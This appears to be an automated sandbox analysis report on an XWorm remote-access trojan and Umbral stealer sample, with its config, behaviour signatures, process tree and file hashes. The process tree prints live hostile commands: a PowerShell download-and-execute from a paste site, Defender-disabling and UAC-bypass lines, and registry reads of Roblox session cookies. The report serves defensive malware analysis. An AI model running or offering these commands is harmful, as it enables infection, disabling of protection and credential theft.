Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win11-20241007-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    04/01/2025, 18:13

General

  • Target

    New Text Document.txt

  • Size

    48B

  • MD5

    534f5be9d239737fc0f7988c0d8f55ab

  • SHA1

    7bd8add72810ae2c725bcbd4f001ee37e1aef16e

  • SHA256

    bd9337e4327ce6c4b8cf3c2de54bc60605f93d59a87e4e6f1b9d90a4d73ec3bf

  • SHA512

    e6447c19a57b17c252f9569c22b737ae9ca2afb7ef307bf3d7513af96c4b95e1f66280277ad22c9e8cff0db99f6aea02c12965a04568766d2c2e2101e6f2f93b

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

AEfEUs08j7ZtP2B5

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/pv132qGS

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar secrets.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3520
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\New Text Document.txt
      2⤵
      PID:1320
  • C:\Windows\system32\BackgroundTransferHost.exe
    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
    1⤵
    • Modifies registry class
    PID:1832
  • C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell "irm paste.fo/raw/7085afc2db6e | iex"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord
        3⤵
        • UAC bypass
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3220
      • C:\ProgramData\SVrB5SO0.exe
        "C:\ProgramData\SVrB5SO0.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4728
        • C:\Users\Admin\AppData\Local\Temp\svhost.exe
          "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
          4⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4180
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4800
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1400
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3904
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4776
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1000
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4116
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            5⤵
            PID:3784
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4572
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            5⤵
            • Detects videocard installed
            PID:3136
        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
          "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4620
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3208
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4276
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4692
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1460
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:3584

        Downloads

        • C:\ProgramData\SVrB5SO0.exe

          Filesize

          122KB

          MD5

          23c81c7ea6b302b5171d035742228599

          SHA1

          83f6712a0f42802d39356edabf6b74f37e049edd

          SHA256

          797ec2edd1d1a40a58004e5cda724f010310cdb388c368cb19ebc2aef0505a51

          SHA512

          931a6d93ce3422479479f5cdd073781cfd5d35e0244996242138f2dc2ffec953a43922d4fa14b16dab661dfe58a0331e7d1b208f04a39f03d0ad2ab7bb1fb962

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          88dc70c361a22feac57b031dd9c1f02f

          SHA1

          a9b4732260c2a323750022a73480f229ce25d46d

          SHA256

          43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

          SHA512

          19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          de1cbc191bee1d162d00561785ff3e3f

          SHA1

          e65c6208aaeb730c3242fec9afbfe797fb464f66

          SHA256

          7eda0e7287adda6d5511bb314988c270a1ec05a6bd7fcbfab698ed7b4b195434

          SHA512

          af507d8a805f43842e87414b43c1a0f8973f3d663d2efeb0556b9d212741d159e2f0d0e0528588d9dba1278cca1efd37ab4d28c118c4424345191d0b016d2013

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          63e54ca6551a4a091cca75d55e9122b2

          SHA1

          7afd34b6d2008fec2a36d984d535aea7406a66ce

          SHA256

          e263f5f17c235debb019644319a773d5feabd2f80fdb3d7783762ba572fe875b

          SHA512

          22e332795de470945a1864cfe32e90cd993554cf139467610abdb20b1608c2a7e0177f001b2b6f0032daa780980207943b6e1e4f0960e0576a1aea76fd1dd13e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          de89a1120b8481c3c1b76f2add8f73f1

          SHA1

          8436ce4747b20112c880b6aa5defc64e1c17bbe5

          SHA256

          b217a895d769427909ac8a7f38b0992083760e1811b1eaf14082cf59cad50e8e

          SHA512

          958f8d1bcf3a585c66123df4a3e9c976d5f90e23e457f33c342ebd4f929aae961a5baef0a19583ebb827707bb6d678a5e66a6637d8c263fb1c9dcf444ae2e2c7

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          21017c68eaf9461301de459f4f07e888

          SHA1

          41ff30fc8446508d4c3407c79e798cf6eaa5bb73

          SHA256

          03b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888

          SHA512

          956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          301355fffac842f25ed3d189d6c193b8

          SHA1

          01b9b89277345425c74b8c0213c53132bcd55373

          SHA256

          d0856ea99d7069a23c3efaf5f476dc747aa95ade755589d4930baece4eed255f

          SHA512

          40e5a6772802cd85560146b2de62bb624da9a4eb6b4b0319a0fcda01c0707faf93958ed56350107840a85b8dcacf49bc35779d6baaaa1064b61d08d1e8eababf

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          df808b11175970c23f00e611a7b6d2cc

          SHA1

          0243f099e483fcafb6838c0055982e65634b6db6

          SHA256

          2d5eec6aeee0c568d08cc1777a67b529dce3133efc761ef4b4643d4b2003d43d

          SHA512

          c7c4e39be7cb6bfda48055cd2b0b05a6b6a71131a124730f62928600a5870303e06e3db54634c45f86310413126d2524f51002d5f36f7012e41b641992b5ac89

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          144f438b0fd835b607788b78c91deedf

          SHA1

          f65a34e8feb1485662c2fba5755877fcbb1b7993

          SHA256

          40d50ef3ef0c466dd4a1fa2f0e64620bac538721b4779c31753aa44368db2ad1

          SHA512

          93bec1d243b234395582f9b11dea41812daa61d13f0d5ebe973266df2757a0ac2f8f9ccff0aa14775da2d50262d14c0292da1a42a4c9886e5932d3ba33b3902c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          f70b37ca592bbc43f4264f53ab4cbfdc

          SHA1

          b2ca4feeaa2fe02a146216e21cd4b057c3a16c06

          SHA256

          e72516ce98729a87d654c54b2b0985e9938521f0073c1584becfcc5293f50783

          SHA512

          96b171e2679a95d83b231151872cbc0362355c16a2badef95b9dc76697bf972395b1c31d1ac7c3d6926126db805db56000dce3bb900706f40ee0a98f7cb79d8e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          1a9fa92a4f2e2ec9e244d43a6a4f8fb9

          SHA1

          9910190edfaccece1dfcc1d92e357772f5dae8f7

          SHA256

          0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

          SHA512

          5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          45741c307af2576c6437c5fdb24ef9ce

          SHA1

          a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf

          SHA256

          7887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2

          SHA512

          39fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941

        • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\c897f032-8c00-4884-b539-5f4c84b2c2ad.down_data

          Filesize

          555KB

          MD5

          5683c0028832cae4ef93ca39c8ac5029

          SHA1

          248755e4e1db552e0b6f8651b04ca6d1b31a86fb

          SHA256

          855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

          SHA512

          aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltrjuwsq.j1y.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

          Filesize

          39KB

          MD5

          f705f2da1824f04ae5a190b8259c3971

          SHA1

          7e8f02accd7205e564696e791c4dbef66f2b3bd5

          SHA256

          06daf892bd82e2da28a493b7c9dff9b4d822e1d0ba55671772cd032885d6fb4f

          SHA512

          530d56a52067f26d9d50d8edefb68caa65b6be9c58692fc14c417fee7799e3f1ed1ba57b2159be91965034f733a5de7af5042b2297d6f02a6ad282b5b4aa0d56

        • C:\Users\Admin\AppData\Local\Temp\svhost.exe

          Filesize

          231KB

          MD5

          0c01352317f572daab13794a8dc3e3a5

          SHA1

          309b2c1c1d7ea267e4fec39b67f26450d72b30d5

          SHA256

          6c85ac3b26d88512a75af25509b4c5f0a1e345e9c03b3a38884382a70a4748bd

          SHA512

          7ccb1b18ce0090a83938cb84f98104714bb9866ab82df04ffc5a682f3bb7ad76cdf59c0b95cc2a725f58af4358c0f25537087e937296f45f54214d31aa4726ad

        • memory/2212-15-0x0000015E44550000-0x0000015E44712000-memory.dmp

          Filesize

          1.8MB

        • memory/2212-11-0x0000015E43F30000-0x0000015E43F52000-memory.dmp

          Filesize

          136KB

        • memory/4180-89-0x000001D26CA90000-0x000001D26CAAE000-memory.dmp

          Filesize

          120KB

        • memory/4180-88-0x000001D26D530000-0x000001D26D5A6000-memory.dmp

          Filesize

          472KB

        • memory/4180-124-0x000001D26CA60000-0x000001D26CA6A000-memory.dmp

          Filesize

          40KB

        • memory/4180-125-0x000001D26CAB0000-0x000001D26CAC2000-memory.dmp

          Filesize

          72KB

        • memory/4180-87-0x000001D26D440000-0x000001D26D490000-memory.dmp

          Filesize

          320KB

        • memory/4180-62-0x000001D26AC40000-0x000001D26AC80000-memory.dmp

          Filesize

          256KB

        • memory/4620-63-0x00000000009D0000-0x00000000009E0000-memory.dmp

          Filesize

          64KB

        • memory/4728-39-0x0000000000A00000-0x0000000000A24000-memory.dmp

          Filesize

          144KB